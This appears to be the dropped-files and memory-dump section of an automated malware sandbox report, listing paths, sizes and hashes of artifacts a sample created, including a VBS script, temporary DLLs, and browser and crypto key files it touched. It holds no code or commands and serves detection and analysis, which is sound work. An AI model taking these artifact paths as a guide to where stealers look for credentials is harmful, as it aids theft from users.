8884aefe5e7323940fed6fe435406458c571c4c72116e1293bff6d8fa7ce75f120e9073e7ca9e99dcc3f5a8715f0f1982518af96d01838ea08176749d4ed32a1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
12KB

MD5
fb55b5ab86cc500151aca7ddae33c126

SHA1
e01ce7ae777c16187179a1750de42e5cb5e0a9a4

SHA256
00a588c055dcff9b552a86c226ad0d221fb2bb27fadd6ba01bb27545907048e6

SHA512
13539b1799a2d25f6954397fcf4187f926d040d91e7be8539f3306935702edb72c0d6234997d01a45f4cbbf136838bdd765cbffeaa44903a68f405f87e53273e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
12KB

MD5
c5af9ed4a13cd9f1824e7909a484cb5d

SHA1
22de2b28ca7eff19c6e8927c6b4478a21f56364f

SHA256
7c97ecbb803411d7f3891e5f017d94b71c467b304468a6bdafcbd6d83dbac430

SHA512
5e1afaeddd4ac719d6107bc3df04d5938d3daaa4efb7c78dd1c720ac00ab74b6d6b6d70629602ab72c77e0f1e3c85499983dedb7d902d59b7d7af6b0c595cb58

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
12KB

MD5
6ad32cc6e0c49941b646835e5e2f4653

SHA1
1b5ec2216ba2d4f1abfc594bda4345273b96a7f1

SHA256
1c0f1fdeb1ab13d3f567da87f543c881142d4580c962f0f37dd0ec7f2d26d6df

SHA512
4f6f4e06716a6bb816bc1bb915da74a0298926567b28e2873fd6b16664fd7b2131800d07d6df6583c8b55c5dbb5dc977b3341fafb792a3c278571b76c728997d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
d3c2cc14bf7eb07618cb6364176f2a0e

SHA1
0a1b706d39b5ab581a24f6a0a9e72954152923b7

SHA256
135580dea2f97611143a0376a3947b80722b8bd9153632111be32ff00a1c5851

SHA512
7df0895e11e04ede2a76e20b4df86a71e33babde960f87816e8c2a0d3743cc68fb7832ff3b4ab5b5fff395304645515f7ac21dd8aff1dfec2449a89d9504e342

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db

Filesize
28KB

MD5
dce818071cca5c6804c8f0565a0ee3a1

SHA1
4bdbf406cc0a9ed46c8c704c534f9b704cf40bf6

SHA256
40b40134cc5065f0be083010b71a20c79781f2d24c16045ef74bdb0ec32b3df0

SHA512
0ffde02f8b68fe8448c43465a4d4d7afb635dc7da2d74ffdbaf63952533ed94f24930adf4729be5b17f4db143e75112c9aff4b22174d4b97ed23fbf8c5225aa5

Download Submit
C:\Users\Admin\AppData\Local\Temp\DB1

Filesize
40KB

MD5
a182561a527f929489bf4b8f74f65cd7

SHA1
8cd6866594759711ea1836e86a5b7ca64ee8911f

SHA256
42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914

SHA512
9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_swizse1g.urx.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-ESCJA.tmp\setup.tmp

Filesize
3.1MB

MD5
e5164b22c1210d1095ca06cdd68626e6

SHA1
065962e48d144f62beb444c90587ecd6b2dbfd6a

SHA256
75e11f5de3eccc25f09472ae33941790b4e18467a1a768ca9efe566de413c962

SHA512
098e1d9344fc3062077a4439c9c06ca979638b5b0b73b126699459597c1e8a58566a024d89d9cd653f6a3a519971e54cd34f13df27746c033bad76b12e5074c2

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-493223053-2004649691-1575712786-1000\0f5007522459c86e95ffcc62f32308f1_755b0f1a-bb38-4bb2-bc7e-240c892146ee

Filesize
46B

MD5
d898504a722bff1524134c6ab6a5eaa5

SHA1
e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

SHA256
878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

SHA512
26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-493223053-2004649691-1575712786-1000\0f5007522459c86e95ffcc62f32308f1_755b0f1a-bb38-4bb2-bc7e-240c892146ee

Filesize
46B

MD5
c07225d4e7d01d31042965f048728a0a

SHA1
69d70b340fd9f44c89adb9a2278df84faa9906b7

SHA256
8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

SHA512
23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Spelling\en-US\default.dic

Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5d696d521de238c3.customDestinations-ms

Filesize
11KB

MD5
2562a1aaeba3b48e1735855f3af5655f

SHA1
a4c2645242e2d9e3a3c6a164db83d0a0fedc577e

SHA256
bb00fe31259cf9c96d8f292fa0a74f0ba942d63acc92594f0b80194f037eedf6

SHA512
eab4db24b581bbad118562bd3b07d3b178544daabfe59c87c14a154f0560e03f840ff9e84c4f309726324da1bb80bc02eb80c68d9f16f4cd359bfc0c5f19efa3

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5d696d521de238c3.customDestinations-ms

Filesize
11KB

MD5
5ec6a20df7e89814c1d3ed3b289ce116

SHA1
0f1df6c8f35d181322d85ce9ecddaa6a96c41693

SHA256
35de91176826733566ced771edee52a808f9775c4383503185dfec703a478dc7

SHA512
9f077e7952749e1042fcc3324357ea2c9c5522a7e2c34d45eafbe7b08d89b616601dab88f395e8bdd7b67b6c7e0d4e74f71524d84c8ab2783aa6dd2422df50a7

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5d696d521de238c3.customDestinations-ms

Filesize
12KB

MD5
493ed7c5933fa7793b96b381bcef932c

SHA1
4381600d4e519c71208dc9355f786593ac3d94ab

SHA256
bc837222be48e06026f7e0fb8db1c8d71fb0a33f35f10283452000a9ad67aacc

SHA512
1d2f133390ebce756d5bfe65e0935ab783655cdcfbf174c8e4342d0632d53c477c499ff03e653aebc82c5118155e3a9034f9c501e37675cac7131ece42ba040f

Download Submit
C:\Users\Admin\AppData\Roaming\picturewithattitudeevenbetterforallthin.vbs

Filesize
137KB

MD5
8575080d678736f4370fa4b88d00c148

SHA1
ec4023c9d47d5d4c93e1f76d6400c6dfbec3a143

SHA256
521c52c7c4e3e15c8d9805eeb75b45c85679c7ac9e744d9f53d67a7840cf309f

SHA512
3b3e106f9ff3f57a41ca101e179c373e0782a1d5a82a113ee72b993893c4f5ad615d075631904ee3ab417f4b7f10062f15153280b159623ad8b0f71d49073593

Download Submit
C:\Users\Admin\Downloads\samples\32b786ed47a62c8c8f2332299722b31f2149cf370689691268bf88fb1dae35ea\32b786ed47a62c8c8f2332299722b31f2149cf370689691268bf88fb1dae35ea.exe

Filesize
1.3MB

MD5
387486fdff15b2eb480ce17954e802f4

SHA1
3f4d04bd7f438b2d24ec1c98da1a3fa4cf082b34

SHA256
32b786ed47a62c8c8f2332299722b31f2149cf370689691268bf88fb1dae35ea

SHA512
03ae51f50293b8c59f86a329dbf548840047cfa1b853da8dbadb36fbd56942594043bc9e5aa2b74e48948f1fb1f59c64edc6b867bdd91bde521ebf2b89d6f5a5

Download Submit
C:\Windows\Temp\67a04372\_ad74B1.adx

Filesize
10KB

MD5
2c9b4977a5930cccea14e9c72b46561c

SHA1
7f297c9a4d24ffaf9a0a416c90893c319310bc3e

SHA256
5d99af59fa594972ba9707d68a4f77618ad0c361f5eb4c9f282a6b28d8107831

SHA512
8fc8efaeeb9681cb4a32c941f8754e4883f22b24aea8bb97274d8842e155e37904324ec895d2783417deaba1f9d67ead4576007817c252d896a4f21dc68b2bec

Download Submit
C:\Windows\Temp\67a04372\_ad74B1.rtp

Filesize
413B

MD5
7dc80c26c92a0f26a7240ab82e9aa319

SHA1
3b0c094bddc33b5ea42d9b7e242042d90e2c1a32

SHA256
d0d0e3ca901a042985cd76a27ef0fbf8124f5c225cb286296cc652eb88e56a52

SHA512
de7884ff7a6aabd658849719a0274b2c753ffc0db8ea210c0b91016c7d0322fa97c25197cbb10d720f06d4ee7c93f08210d2e76427c111da2f07af36c362f54f

Download Submit
C:\Windows\Temp\_ad74B1.dll

Filesize
76KB

MD5
f872d81424fb9643df3fe92d618cf0c8

SHA1
865f59aa7c56c0908cdcf0b4b805a3618ea404d2

SHA256
408b932804d8bc9eae1f7100381b87f720421359ffb6c75cdf5278d715d70831

SHA512
4dfa853b3d40c183e729df2f5acf7f55d27ce73a86f7f65841242f5c0b51bd32d17c74bdb6b733953c4fe24661bdd9f746be5e7f7b978e12d79ee0f4f98654e2

Download Submit
\??\pipe\crashpad_780_OXYYIJVPWWGILNPS

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/784-876-0x0000000002650000-0x0000000002678000-memory.dmp

Filesize
160KB

Download
memory/784-880-0x0000000002690000-0x000000000269F000-memory.dmp

Filesize
60KB

Download
memory/784-881-0x0000000000400000-0x0000000000518000-memory.dmp

Filesize
1.1MB

Download
memory/1076-5184-0x0000000007060000-0x00000000071B8000-memory.dmp

Filesize
1.3MB

Download
memory/1544-4015-0x00000000070A0000-0x00000000070BA000-memory.dmp

Filesize
104KB

Download
memory/1544-4020-0x00000000072E0000-0x00000000072F4000-memory.dmp

Filesize
80KB

Download
memory/1544-4018-0x00000000072A0000-0x00000000072B1000-memory.dmp

Filesize
68KB

Download
memory/1544-4014-0x00000000076F0000-0x0000000007D6A000-memory.dmp

Filesize
6.5MB

Download
memory/1544-4016-0x0000000007110000-0x000000000711A000-memory.dmp

Filesize
40KB

Download
memory/1544-4013-0x0000000006F50000-0x0000000006FF3000-memory.dmp

Filesize
652KB

Download
memory/1544-4012-0x0000000006330000-0x000000000634E000-memory.dmp

Filesize
120KB

Download
memory/1544-4001-0x0000000006F10000-0x0000000006F42000-memory.dmp

Filesize
200KB

Download
memory/1544-4021-0x00000000073F0000-0x000000000740A000-memory.dmp

Filesize
104KB

Download
memory/1544-4022-0x0000000007320000-0x0000000007328000-memory.dmp

Filesize
32KB

Download
memory/1544-4017-0x0000000007330000-0x00000000073C6000-memory.dmp

Filesize
600KB

Download
memory/1544-4002-0x000000006C670000-0x000000006C6BC000-memory.dmp

Filesize
304KB

Download
memory/1544-4019-0x00000000072D0000-0x00000000072DE000-memory.dmp

Filesize
56KB

Download
memory/2436-889-0x0000000000A50000-0x0000000000A78000-memory.dmp

Filesize
160KB

Download
memory/2436-975-0x0000000000A50000-0x0000000000A78000-memory.dmp

Filesize
160KB

Download
memory/2436-1074-0x0000000000400000-0x0000000000518000-memory.dmp

Filesize
1.1MB

Download
memory/2436-974-0x0000000000400000-0x0000000000518000-memory.dmp

Filesize
1.1MB

Download
memory/2436-892-0x0000000000A80000-0x0000000000A8F000-memory.dmp

Filesize
60KB

Download
memory/2832-960-0x0000000000400000-0x0000000000719000-memory.dmp

Filesize
3.1MB

Download
memory/2832-820-0x0000000000400000-0x0000000000719000-memory.dmp

Filesize
3.1MB

Download
memory/2832-714-0x0000000000400000-0x0000000000719000-memory.dmp

Filesize
3.1MB

Download
memory/2832-981-0x0000000000400000-0x0000000000719000-memory.dmp

Filesize
3.1MB

Download
memory/3148-1592-0x0000000000400000-0x00000000013CB000-memory.dmp

Filesize
15.8MB

Download
memory/3148-1066-0x00000000037A0000-0x00000000037C8000-memory.dmp

Filesize
160KB

Download
memory/3148-979-0x00000000037A0000-0x00000000037C8000-memory.dmp

Filesize
160KB

Download
memory/3148-978-0x0000000003760000-0x0000000003784000-memory.dmp

Filesize
144KB

Download
memory/3148-1065-0x0000000000400000-0x00000000013CB000-memory.dmp

Filesize
15.8MB

Download
memory/4072-669-0x0000000000401000-0x00000000004B7000-memory.dmp

Filesize
728KB

Download
memory/4072-982-0x0000000000400000-0x00000000004DF000-memory.dmp

Filesize
892KB

Download
memory/4072-668-0x0000000000400000-0x00000000004DF000-memory.dmp

Filesize
892KB

Download
memory/4072-704-0x0000000000400000-0x00000000004DF000-memory.dmp

Filesize
892KB

Download
memory/4136-5267-0x0000000000260000-0x0000000000979000-memory.dmp

Filesize
7.1MB

Download
memory/4136-5265-0x0000000000260000-0x0000000000979000-memory.dmp

Filesize
7.1MB

Download
memory/4320-3326-0x0000000005270000-0x0000000005814000-memory.dmp

Filesize
5.6MB

Download
memory/4320-3325-0x0000000000610000-0x0000000000652000-memory.dmp

Filesize
264KB

Download
memory/4320-3327-0x0000000004CC0000-0x0000000004D26000-memory.dmp

Filesize
408KB

Download
memory/4320-3334-0x0000000005F80000-0x0000000006012000-memory.dmp

Filesize
584KB

Download
memory/4320-3336-0x0000000006020000-0x0000000006070000-memory.dmp

Filesize
320KB

Download
memory/4320-3337-0x0000000006170000-0x000000000617A000-memory.dmp

Filesize
40KB

Download
memory/4368-3488-0x0000000000820000-0x0000000000860000-memory.dmp

Filesize
256KB

Download
memory/4944-903-0x0000000000400000-0x00000000004B5000-memory.dmp

Filesize
724KB

Download
memory/5444-4083-0x0000000005D10000-0x0000000005DFE000-memory.dmp

Filesize
952KB

Download
memory/5444-4077-0x0000000000180000-0x00000000001E6000-memory.dmp

Filesize
408KB

Download
memory/5444-5164-0x0000000006260000-0x00000000062B4000-memory.dmp

Filesize
336KB

Download
memory/5444-5159-0x0000000006020000-0x0000000006082000-memory.dmp

Filesize
392KB

Download
memory/5444-5160-0x0000000005F50000-0x0000000005F9C000-memory.dmp

Filesize
304KB

Download
memory/6584-5169-0x0000000005130000-0x00000000051CC000-memory.dmp

Filesize
624KB

Download
memory/6584-5227-0x0000000006520000-0x00000000066E2000-memory.dmp

Filesize
1.8MB

Download
memory/6584-5168-0x0000000000400000-0x0000000000426000-memory.dmp

Filesize
152KB

Download
memory/6964-3983-0x0000000005F70000-0x00000000062C4000-memory.dmp

Filesize
3.3MB

Download
memory/6964-3970-0x0000000004F90000-0x0000000004FC6000-memory.dmp

Filesize
216KB

Download
memory/6964-3971-0x0000000005600000-0x0000000005C28000-memory.dmp

Filesize
6.2MB

Download
memory/6964-3972-0x0000000005570000-0x0000000005592000-memory.dmp

Filesize
136KB

Download
memory/6964-3973-0x0000000005D20000-0x0000000005D86000-memory.dmp

Filesize
408KB

Download
memory/6964-4045-0x00000000078F0000-0x0000000007912000-memory.dmp

Filesize
136KB

Download
memory/6964-3985-0x0000000006520000-0x000000000653E000-memory.dmp

Filesize
120KB

Download
memory/6964-3986-0x0000000006910000-0x000000000695C000-memory.dmp

Filesize
304KB

Download
memory/6964-4033-0x0000000006AE0000-0x0000000006AE8000-memory.dmp

Filesize
32KB

Download